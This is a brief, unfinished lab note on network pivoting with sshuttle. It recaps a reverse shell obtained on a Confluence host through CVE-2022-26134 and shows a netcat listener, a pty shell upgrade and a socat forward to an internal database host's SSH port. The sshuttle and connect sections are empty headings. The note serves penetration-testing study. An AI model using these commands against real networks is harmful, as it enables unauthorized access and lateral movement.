Sshuttle

sshuttle is a tool that creates a VPN-like tunnel over SSH. It transparently routes traffic to specified subnets through an SSH connection. It requires root privileges on the client (attacker) machine and Python 3 on the SSH server (pivot host).

Particularly useful when classic dynamic port forwarding is cumbersome to manage.

Tunelling scenario recap:

1. Got a reverse shell on CONFLUENCE01 (192.168.125.63) via CVE-2022-26134.

2. We can SSH to PGDATABASE01 (10.4.125.215) from CONFLUENCE01.

3. Our goal is to access the following internal networks: 10.4.125.0/24 and 172.16.125.0/24.

1. Local Port Foward

We can set up a port forward on CONFLUENCE01, forwarding local port 2222 to PGDATABASE01:22 using socat. This makes PGDATABASE01’s SSH service available on CONFLUENCE01:2222.

$ nc -lvnp 4444
...
confluence@confluence01:/opt/atlassian/confluence/bin$ python3 -c 'import pty;pty.spawn("/bin/sh")'
$ socat TCP-LISTEN:2222,fork TCP:10.4.125.215:22

2. Sshuttle

3. Connect